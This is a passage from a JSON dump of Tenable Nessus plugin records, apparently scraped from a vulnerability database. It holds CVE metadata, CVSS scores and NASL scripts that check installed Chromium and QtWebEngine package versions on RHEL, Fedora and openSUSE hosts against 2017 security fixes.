'content/fastrack/rhel/server/6/x86_64/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/optional/debug',\n 'content/fastrack/rhel/server/6/x86_64/optional/os',\n 'content/fastrack/rhel/server/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/os',\n 'content/fastrack/rhel/workstation/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/os',\n 'content/fastrack/rhel/workstation/6/i386/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE},\n {'reference':'chromium-browser-80.0.3987.122-1.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'allowmaj':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium-browser');\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:29:47", "description": "This update updates QtWebEngine to the 5.9.1 release, a security and bugfix release from the 5.9 branch. QtWebEngine 5.9.1 is part of the Qt 5.9.1 release, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.9.0:\nCVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5083, CVE-2017-5088, and CVE-2017-5089 (security fixes from Chromium up to version 59.0.3071.104).\n\nOther notable bugfixes include :\n\n - [QTBUG-59690] Fixed issue with drops\n\n - [QTBUG-60588] Fixed error in updating user-agent and accept-language\n\n - [QTBUG-61047] Fixed assert in URLRequestContextGetterQt\n\n - [QTBUG-61186] Fixed cancellation of upload folder dialogs\n\n - [QTBUG-57675] Fixed WebEngineNewViewRequest::requestedUrl when opening window from JavaScript\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-18T00:00:00", "type": "nessus", "title": "Fedora 25 : qt5-qtwebengine (2017-a7a488d8d0)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5083", "CVE-2017-5088", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-A7A488D8D0.NASL", "href": "https://www.tenable.com/plugins/nessus/101779", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-a7a488d8d0.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101779);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5083\",\n \"CVE-2017-5088\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-a7a488d8d0\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 25 : qt5-qtwebengine (2017-a7a488d8d0)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update updates QtWebEngine to the 5.9.1 release, a security and\nbugfix release from the 5.9 branch. QtWebEngine 5.9.1 is part of the\nQt 5.9.1 release, but only the QtWebEngine component is included in\nthis update.\n\nThe update fixes the following security issues in QtWebEngine 5.9.0:\nCVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076,\nCVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5083,\nCVE-2017-5088, and CVE-2017-5089 (security fixes from Chromium up to\nversion 59.0.3071.104).\n\nOther notable bugfixes include :\n\n - [QTBUG-59690] Fixed issue with drops\n\n - [QTBUG-60588] Fixed error in updating user-agent and\n accept-language\n\n - [QTBUG-61047] Fixed assert in URLRequestContextGetterQt\n\n - [QTBUG-61186] Fixed cancellation of upload folder\n dialogs\n\n - [QTBUG-57675] Fixed\n WebEngineNewViewRequest::requestedUrl when opening\n window from JavaScript\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a7a488d8d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt5-qtwebengine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"qt5-qtwebengine-5.9.1-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:30:57", "description": "This update updates QtWebEngine to the 5.9.1 release, a security and bugfix release from the 5.9 branch. QtWebEngine 5.9.1 is part of the Qt 5.9.1 release, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.9.0:\nCVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5083, CVE-2017-5088, and CVE-2017-5089 (security fixes from Chromium up to version 59.0.3071.104).\n\nOther notable bugfixes include :\n\n - [QTBUG-59690] Fixed issue with drops\n\n - [QTBUG-60588] Fixed error in updating user-agent and accept-language\n\n - [QTBUG-61047] Fixed assert in URLRequestContextGetterQt\n\n - [QTBUG-61186] Fixed cancellation of upload folder dialogs\n\n - [QTBUG-57675] Fixed WebEngineNewViewRequest::requestedUrl when opening window from JavaScript\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : qt5-qtwebengine (2017-1e34da27f3)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5083", "CVE-2017-5088", "CVE-2017-5089"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-1E34DA27F3.NASL", "href": "https://www.tenable.com/plugins/nessus/101583", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-1e34da27f3.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101583);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5083\",\n \"CVE-2017-5088\",\n \"CVE-2017-5089\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-1e34da27f3\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 26 : qt5-qtwebengine (2017-1e34da27f3)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update updates QtWebEngine to the 5.9.1 release, a security and\nbugfix release from the 5.9 branch. QtWebEngine 5.9.1 is part of the\nQt 5.9.1 release, but only the QtWebEngine component is included in\nthis update.\n\nThe update fixes the following security issues in QtWebEngine 5.9.0:\nCVE-2017-5070, CVE-2017-5071, CVE-2017-5075, CVE-2017-5076,\nCVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5083,\nCVE-2017-5088, and CVE-2017-5089 (security fixes from Chromium up to\nversion 59.0.3071.104).\n\nOther notable bugfixes include :\n\n - [QTBUG-59690] Fixed issue with drops\n\n - [QTBUG-60588] Fixed error in updating user-agent and\n accept-language\n\n - [QTBUG-61047] Fixed assert in URLRequestContextGetterQt\n\n - [QTBUG-61186] Fixed cancellation of upload folder\n dialogs\n\n - [QTBUG-57675] Fixed\n WebEngineNewViewRequest::requestedUrl when opening\n window from JavaScript\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-1e34da27f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected qt5-qtwebengine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"qt5-qtwebengine-5.9.1-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:06", "description": "This update to Chromium 59.0.3071.86 fixes the following security issues :\n\n - CVE-2017-5070: Type confusion in V8\n\n - CVE-2017-5071: Out of bounds read in V8\n\n - CVE-2017-5072: Address spoofing in Omnibox\n\n - CVE-2017-5073: Use after free in print preview\n\n - CVE-2017-5074: Use after free in Apps Bluetooth\n\n - CVE-2017-5075: Information leak in CSP reporting\n\n - CVE-2017-5086: Address spoofing in Omnibox\n\n - CVE-2017-5076: Address spoofing in Omnibox\n\n - CVE-2017-5077: Heap buffer overflow in Skia\n\n - CVE-2017-5078: Possible command injection in mailto handling\n\n - CVE-2017-5079: UI spoofing in Blink\n\n - CVE-2017-5080: Use after free in credit card autofill\n\n - CVE-2017-5081: Extension verification bypass\n\n - CVE-2017-5082: Insufficient hardening in credit card editor\n\n - CVE-2017-5083: UI spoofing in Blink\n\n - CVE-2017-5085: Inappropriate JavaScript execution on WebUI pages", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-08T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2017-661)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-661.NASL", "href": "https://www.tenable.com/plugins/nessus/100676", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-661.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100676);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2017-661)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update to Chromium 59.0.3071.86 fixes the following security\nissues :\n\n - CVE-2017-5070: Type confusion in V8\n\n - CVE-2017-5071: Out of bounds read in V8\n\n - CVE-2017-5072: Address spoofing in Omnibox\n\n - CVE-2017-5073: Use after free in print preview\n\n - CVE-2017-5074: Use after free in Apps Bluetooth\n\n - CVE-2017-5075: Information leak in CSP reporting\n\n - CVE-2017-5086: Address spoofing in Omnibox\n\n - CVE-2017-5076: Address spoofing in Omnibox\n\n - CVE-2017-5077: Heap buffer overflow in Skia\n\n - CVE-2017-5078: Possible command injection in mailto\n handling\n\n - CVE-2017-5079: UI spoofing in Blink\n\n - CVE-2017-5080: Use after free in credit card autofill\n\n - CVE-2017-5081: Extension verification bypass\n\n - CVE-2017-5082: Insufficient hardening in credit card\n editor\n\n - CVE-2017-5083: UI spoofing in Blink\n\n - CVE-2017-5085: Inappropriate JavaScript execution on\n WebUI pages\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1042833\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromedriver-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromedriver-debuginfo-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-debuginfo-59.0.3071.86-104.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"chromium-debugsource-59.0.3071.86-104.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:46", "description": "The version of Google Chrome installed on the remote Windows host is prior to 59.0.3071.86. It is, therefore, affected by the following vulnerabilities :\n\n - A type confusion error exists in the Google V8 component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-5070)\n\n - An out-of-bounds read error exists in the Google V8 component that allows an unauthenticated, remote attacker to cause a denial of service condition or the disclosure of sensitive information. (CVE-2017-5071)\n\n - Multiple unspecified flaws exist in the Omnibox component that allows an attacker to spoof the address in the address bar. (CVE-2017-5072, CVE-2017-5076, CVE-2017-5083, CVE-2017-5086)\n\n - A use-after-free error exists in the 